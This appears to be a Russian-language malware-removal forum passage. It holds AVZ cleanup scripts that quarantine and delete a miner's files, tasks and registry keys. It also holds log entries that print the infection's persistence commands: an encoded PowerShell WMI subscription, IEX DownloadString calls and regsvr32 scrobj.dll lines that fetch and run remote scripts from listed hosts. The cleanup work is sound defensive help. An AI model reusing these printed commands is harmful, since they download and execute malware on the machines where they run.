begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
end;
QuarantineFile('C:\Users\Серго\AppData\Local\Pupdbrowser\Pupdbrowser.exe','');
QuarantineFile('c:\windows\update.exe>','');
QuarantineFile('c:\windows\debug\item.dat','');
QuarantineFile('c:\windows\debug\item.dat>','');
QuarantineFile('c:\windows\help\lsmosee.exe>','');
QuarantineFile('c:\windows\debug\ok.dat','');
QuarantineFile('C:\Users\Серго\AppData\Roaming\nssm.exe','');
DeleteFile('C:\Users\Серго\AppData\Roaming\nssm.exe','32');
DeleteFile('c:\windows\debug\ok.dat','32');
DeleteFile('c:\windows\help\lsmosee.exe>','32');
DeleteFile('c:\windows\debug\item.dat>','32');
DeleteFile('c:\windows\debug\item.dat','32');
DeleteFile('c:\windows\update.exe>','32');
DeleteFile('C:\Users\Серго\AppData\Local\Pupdbrowser\Pupdbrowser.exe','32');
DeleteSchedulerTask('Pupdbrowser');
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start','x32');
RegKeyDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start','x32');
DeleteSchedulerTask('Mysa');
DeleteSchedulerTask('Mysa1');
DeleteSchedulerTask('Mysa2');
DeleteSchedulerTask('Mysa3');
DeleteSchedulerTask('ok');
BC_Activate;
ExecuteSysClean;
ExecuteWizard('SCU', 2, 3, true);
BC_ImportALL;
RebootWindows(true);
end.
begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.
O25 - WMI Event: fuckyoumm4 - fuckyoumm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host/1.txt scrobj.dll®svr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll®svr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll
...Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".
O4 - MSConfig\startupreg: start [command] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.0603bye.info:280/v.sct scrobj.dll (HKLM) (2019/10/03)
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
We use cookies and similar technologies for the following purposes:
Do you accept cookies and these technologies?
We use cookies and similar technologies for the following purposes:
Do you accept cookies and these technologies?